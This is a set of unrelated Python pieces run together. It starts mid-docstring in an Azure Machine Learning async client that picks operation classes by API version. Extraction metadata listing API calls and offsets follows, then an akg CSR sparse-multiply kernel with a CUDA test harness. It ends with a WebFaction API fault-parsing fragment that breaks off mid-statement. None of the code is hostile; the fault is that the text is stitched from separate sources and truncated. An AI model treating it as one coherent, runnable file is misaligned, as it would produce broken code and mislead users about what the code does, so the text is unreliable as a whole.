* 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>`
* 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>`
* 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>`
"""
api_version = self._get_api_version('model_containers')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'model_containers'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def model_versions(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>`
* 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>`
* 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>`
* 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>`
"""
api_version = self._get_api_version('model_versions')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'model_versions'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def models(self):
"""Instance depends on the API version:
* 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>`
"""
api_version = self._get_api_version('models')
if api_version == '1.0.0':
from ..model_dataplane.aio.operations import ModelsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'models'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def online_deployments(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>`
* 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>`
* 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>`
"""
api_version = self._get_api_version('online_deployments')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'online_deployments'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def online_endpoints(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>`
* 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>`
* 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>`
"""
api_version = self._get_api_version('online_endpoints')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass
elif api_version == '2022-02-01-preview':
from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import OnlineEndpointsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'online_endpoints'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def operations(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>`
* 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>`
* 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>`
"""
api_version = self._get_api_version('operations')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import Operations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import Operations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_endpoint_connections(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>`
* 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`
* 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>`
"""
api_version = self._get_api_version('private_endpoint_connections')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_endpoint_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_link_resources(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>`
* 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>`
* 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>`
"""
api_version = self._get_api_version('private_link_resources')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_link_resources'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def quotas(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>`
* 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>`
* 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>`
"""
api_version = self._get_api_version('quotas')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'quotas'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def registry_management_non_workspace(self):
"""Instance depends on the API version:
* v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>`
"""
api_version = self._get_api_version('registry_management_non_workspace')
if api_version == 'v1.0':
from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'registry_management_non_workspace'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def run(self):
"""Instance depends on the API version:
* v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>`
"""
api_version = self._get_api_version('run')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'run'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def run_artifacts(self):
"""Instance depends on the API version:
* v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>`
"""
api_version = self._get_api_version('run_artifacts')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'run_artifacts'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def runs(self):
"""Instance depends on the API version:
* v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>`
"""
api_version = self._get_api_version('runs')
if api_version == 'v1.0':
from ..runhistory.aio.operations import RunsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'runs'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def spans(self):
"""Instance depends on the API version:
* v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>`
"""
api_version = self._get_api_version('spans')
if api_version == 'v1.0':
from ..runhistory.aio.operations import SpansOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'spans'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def temporary_data_references(self):
"""Instance depends on the API version:
* 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>`
"""
api_version = self._get_api_version('temporary_data_references')
if api_version == '2021-10-01-dataplanepreview':
from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'temporary_data_references'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def usages(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>`
* 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>`
* 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>`
"""
api_version = self._get_api_version('usages')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'usages'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def virtual_machine_sizes(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>`
* 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>`
* 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>`
"""
api_version = self._get_api_version('virtual_machine_sizes')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'virtual_machine_sizes'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspace_connections(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>`
* 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>`
* 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>`
"""
api_version = self._get_api_version('workspace_connections')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspace_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspace_features(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>`
* 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>`
* 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>`
"""
api_version = self._get_api_version('workspace_features')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspace_features'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def workspaces(self):
"""Instance depends on the API version:
* 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>`
* 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>`
* 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>`
"""
api_version = self._get_api_version('workspaces')
if api_version == '2021-10-01':
from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass
elif api_version == '2022-01-01-preview':
from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass
elif api_version == '2022-05-01':
from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'workspaces'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
async def close(self):
await self._client.close()
async def __aenter__(self):
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details):
await self._client.__aexit__(*exc_details)
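# Illustrative sketch only: every operation-group property above follows the
# same version-dispatch pattern -- look up the API version configured for the
# group, import the matching OperationClass from that versioned sub-package,
# and wire it to the shared client, config and (de)serializers. The toy class
# below (all names hypothetical, not part of this SDK) shows the pattern in
# isolation.
class _VersionDispatchSketch(object):
    def __init__(self, profile, registry):
        # profile: operation-group name -> API version (None key = default)
        # registry: (group, api_version) -> operations class
        self._profile = profile
        self._registry = registry

    def _get_api_version(self, group):
        return self._profile.get(group, self._profile.get(None))

    def resolve(self, group):
        api_version = self._get_api_version(group)
        try:
            return self._registry[(group, api_version)]
        except KeyError:
            raise ValueError(
                "API version {} does not have operation group '{}'".format(
                    api_version, group))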
| [
"azure.profiles.ProfileDefinition",
"azure.mgmt.core.AsyncARMPipelineClient"
] | [((2763, 3637), 'azure.profiles.ProfileDefinition', 'ProfileDefinition', (["{_PROFILE_TAG: {None: DEFAULT_API_VERSION, 'assets': '1.0.0',\n 'async_operations': 'v1.0', 'batch_job_deployment':\n '2020-09-01-dataplanepreview', 'batch_job_endpoint':\n '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':\n '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',\n 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',\n 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':\n 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':\n '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':\n '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',\n 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',\n 'temporary_data_references': '2021-10-01-dataplanepreview'}}", "(_PROFILE_TAG + ' latest')"], {}), "({_PROFILE_TAG: {None: DEFAULT_API_VERSION, 'assets':\n '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment':\n '2020-09-01-dataplanepreview', 'batch_job_endpoint':\n '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container':\n '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',\n 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0',\n 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':\n 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':\n '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':\n '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0',\n 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0',\n 'temporary_data_references': '2021-10-01-dataplanepreview'}}, \n _PROFILE_TAG + ' latest')\n", (2780, 3637), False, 'from azure.profiles import KnownProfiles, ProfileDefinition\n'), ((4382, 4454), 'azure.mgmt.core.AsyncARMPipelineClient', 'AsyncARMPipelineClient', ([], {'base_url': 'base_url', 'config': 'self._config'}), '(base_url=base_url, config=self._config, **kwargs)\n', (4404, 4454), False, 'from azure.mgmt.core import AsyncARMPipelineClient\n')] |
import numpy as np
import scipy.sparse
import akg
from akg import tvm
from akg import topi
from tests.common.base import get_rtol_atol
from tests.common.gen_random import random_gaussian
from tests.common.tensorio import compare_tensor
from akg.utils import kernel_exec as utils
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array, get_shape
from akg.utils.dsl_create import get_broadcast_shape
def csr_mul(dense, sparse_data, col_idx, row_idx, shape):
assert len(shape) == 2, "only supports 2-dim sparse tensor"
assert len(dense.shape) <= 2
assert dense.dtype == sparse_data.dtype, "data and weight must have the same dtype"
num_rows = row_idx.shape[0] - 1
dense_shape = get_shape(dense.shape)
sparse_shape = get_shape(shape)
broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape)
need_expand = tvm.const(len(dense_shape) < len(broadcast_shape))
need_broadcast_first_dim = tvm.const(
len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0])
need_broadcast_last_dim = tvm.const(
len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1])
def gen_ir(dense, sparse_data, col_idx, row_idx, output):
ib = tvm.ir_builder.create()
        # walk the CSR rows via the row pointer array
        with ib.for_range(0, num_rows, name='i') as i:
            start = ib.load(row_idx, i)
            end = ib.load(row_idx, i + 1)
            with ib.for_range(0, end - start, name='j') as j:
                pos = start + j
                with ib.if_scope(pos < end):
                    val = ib.load(sparse_data, pos)
                    col = ib.load(col_idx, pos)
                    # dense is 1-D: broadcast it across all rows
                    with ib.if_scope(need_expand):
                        ib.store(output, pos, val * ib.load(dense, [col]))
                    with ib.else_scope():
                        # dense has a single row: broadcast along the first dim
                        with ib.if_scope(need_broadcast_first_dim):
                            ib.store(output, pos, val * ib.load(dense, [0, col]))
                        with ib.else_scope():
                            # dense has a single column: broadcast along the last dim
                            with ib.if_scope(need_broadcast_last_dim):
                                ib.store(output, pos, val * ib.load(dense, [i, 0]))
                            with ib.else_scope():
                                # shapes match: plain elementwise multiply
                                ib.store(output, pos, val * ib.load(dense, [i, col]))
return ib.get()
output_name = "T_csr_mul_" + dense.op.name + "_" + sparse_data.op.name
out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name)
return tvm.extern([shape],
[dense, sparse_data, col_idx, row_idx],
lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]),
dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name)
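# A plain-NumPy reference of what the generated kernel computes, assuming the
# usual CSR layout (data / col_idx / row_idx). This sketch is illustrative
# only and is not used by csr_mul above.
def _csr_mul_reference(dense, sparse_data, col_idx, row_idx):
    dense = np.asarray(dense)
    out = np.empty_like(sparse_data)
    num_rows = row_idx.shape[0] - 1
    for i in range(num_rows):
        # row_idx[i]:row_idx[i + 1] spans the non-zeros of row i
        for pos in range(row_idx[i], row_idx[i + 1]):
            col = col_idx[pos]
            if dense.ndim == 1:            # 1-D dense broadcast over rows
                d = dense[col]
            elif dense.shape[0] == 1:      # broadcast along the first dim
                d = dense[0, col]
            elif dense.shape[1] == 1:      # broadcast along the last dim
                d = dense[i, 0]
            else:                          # shapes already match
                d = dense[i, col]
            out[pos] = sparse_data[pos] * d
    return out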
def gen_data(shape1, shape2, dtype1, dtype2):
dense = random_gaussian(shape1).astype(dtype1)
sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1)
expect = sparse_data.multiply(np.broadcast_to(dense, shape2))
return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data
def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None):
if not attrs:
attrs = {"target": "cuda"}
# gen data
op_attrs = [shape2]
dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2)
output_shape = expect.shape
attrs["csr_avg_row"] = sparse_data.shape[0] // shape1[0]
mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape],
[dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch,
attrs=attrs, kernel_name="csr_mul")
if len(expect.shape) == 0:
output_shape = (1, )
output = np.zeros(output_shape, expect.dtype)
output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect)
atol, rtol = get_rtol_atol("csr_mul", dtype1)
res = compare_tensor(output, expect, rtol=rtol, atol=atol)
print("Test {}".format("Pass" if res else "Failed"))
target_name = attrs["target"].split()[0]
if not res:
mod_source = mod
if target_name != "llvm":
mod_source = mod.imported_modules[0]
print("Error {}:========================".format(target_name))
print(mod_source.get_source())
raise AssertionError("Test fail")
if attrs["profiling"]:
args_list = to_tvm_nd_array(
[dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0))
target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_time"])
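if __name__ == "__main__":
    # Example invocation (shapes, dtypes and attrs are arbitrary illustrations,
    # not taken from the original test suite); running it needs a working akg
    # build and a CUDA-capable device.
    test_csr_mul((1, 1024), (512, 1024), "float32", "int32", poly_sch=True,
                 attrs={"target": "cuda", "profiling": False, "repeat_time": 1})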
| [
"tests.common.tensorio.compare_tensor",
"akg.tvm.context",
"tests.common.gen_random.random_gaussian",
"tests.common.base.get_rtol_atol",
"akg.tvm.ir_builder.create",
"akg.utils.dsl_create.get_broadcast_shape",
"numpy.zeros",
"akg.utils.format_transform.get_shape",
"akg.tvm.decl_buffer",
"akg.utils.kernel_exec.op_build_test",
"akg.utils.result_analysis.target_profiling",
"numpy.broadcast_to",
"akg.utils.kernel_exec.mod_launch"
] | [((753, 775), 'akg.utils.format_transform.get_shape', 'get_shape', (['dense.shape'], {}), '(dense.shape)\n', (762, 775), False, 'from akg.utils.format_transform import to_tvm_nd_array, get_shape\n'), ((795, 811), 'akg.utils.format_transform.get_shape', 'get_shape', (['shape'], {}), '(shape)\n', (804, 811), False, 'from akg.utils.format_transform import to_tvm_nd_array, get_shape\n'), ((834, 880), 'akg.utils.dsl_create.get_broadcast_shape', 'get_broadcast_shape', (['dense_shape', 'sparse_shape'], {}), '(dense_shape, sparse_shape)\n', (853, 880), False, 'from akg.utils.dsl_create import get_broadcast_shape\n'), ((2458, 2524), 'akg.tvm.decl_buffer', 'tvm.decl_buffer', (['sparse_data.shape', 'sparse_data.dtype', 'output_name'], {}), '(sparse_data.shape, sparse_data.dtype, output_name)\n', (2473, 2524), False, 'from akg import tvm\n'), ((3548, 3753), 'akg.utils.kernel_exec.op_build_test', 'utils.op_build_test', (['csr_mul', '[shape1, sparse_data.shape, col_idx.shape, row_idx.shape]', '[dtype1, dtype1, dtype2, dtype2]'], {'op_attrs': 'op_attrs', 'polyhedral': 'poly_sch', 'attrs': 'attrs', 'kernel_name': '"""csr_mul"""'}), "(csr_mul, [shape1, sparse_data.shape, col_idx.shape,\n row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs,\n polyhedral=poly_sch, attrs=attrs, kernel_name='csr_mul')\n", (3567, 3753), True, 'from akg.utils import kernel_exec as utils\n'), ((3881, 3917), 'numpy.zeros', 'np.zeros', (['output_shape', 'expect.dtype'], {}), '(output_shape, expect.dtype)\n', (3889, 3917), True, 'import numpy as np\n'), ((3931, 4019), 'akg.utils.kernel_exec.mod_launch', 'utils.mod_launch', (['mod', '(dense, sparse_data, col_idx, row_idx, output)'], {'expect': 'expect'}), '(mod, (dense, sparse_data, col_idx, row_idx, output),\n expect=expect)\n', (3947, 4019), True, 'from akg.utils import kernel_exec as utils\n'), ((4033, 4065), 'tests.common.base.get_rtol_atol', 'get_rtol_atol', (['"""csr_mul"""', 'dtype1'], {}), "('csr_mul', dtype1)\n", (4046, 4065), False, 'from tests.common.base import get_rtol_atol\n'), ((4076, 4128), 'tests.common.tensorio.compare_tensor', 'compare_tensor', (['output', 'expect'], {'rtol': 'rtol', 'atol': 'atol'}), '(output, expect, rtol=rtol, atol=atol)\n', (4090, 4128), False, 'from tests.common.tensorio import compare_tensor\n'), ((1289, 1312), 'akg.tvm.ir_builder.create', 'tvm.ir_builder.create', ([], {}), '()\n', (1310, 1312), False, 'from akg import tvm\n'), ((3030, 3060), 'numpy.broadcast_to', 'np.broadcast_to', (['dense', 'shape2'], {}), '(dense, shape2)\n', (3045, 3060), True, 'import numpy as np\n'), ((4680, 4772), 'akg.utils.result_analysis.target_profiling', 'target_profiling', (['mod', '*args_list'], {'target': 'target_name', 'repeat_time': "attrs['repeat_time']"}), "(mod, *args_list, target=target_name, repeat_time=attrs[\n 'repeat_time'])\n", (4696, 4772), False, 'from akg.utils.result_analysis import target_profiling\n'), ((2858, 2881), 'tests.common.gen_random.random_gaussian', 'random_gaussian', (['shape1'], {}), '(shape1)\n', (2873, 2881), False, 'from tests.common.gen_random import random_gaussian\n'), ((4639, 4670), 'akg.tvm.context', 'akg.tvm.context', (['target_name', '(0)'], {}), '(target_name, 0)\n', (4654, 4670), False, 'import akg\n')] |
import ast
EXCEPTION_TYPE_PREFIX = "<class 'webfaction_api.exceptions."
EXCEPTION_TYPE_SUFFIX = "'>"
def _parse_exc_type(exc_type):
# This is horribly hacky, but there's not a particularly elegant
# way to go from the exception type to a string representing that
# exception.
if not exc_type.startswith(EXCEPTION_TYPE_PREFIX):
return None
if not exc_type.endswith(EXCEPTION_TYPE_SUFFIX):
return None
    return exc_type[len(EXCEPTION_TYPE_PREFIX):-len(EXCEPTION_TYPE_SUFFIX)]
def _parse_exc_message(exc_message):
if not exc_message:
return None
message = ast.literal_eval(exc_message)
if isinstance(message, list):
if not message:
return None
return message[0]
return None
class WebFactionFault(Exception):
def __init__(self, underlying):
self.underlying_fault = underlying
try:
exc_type, exc_message = underlying.faultString.split(':', 1)
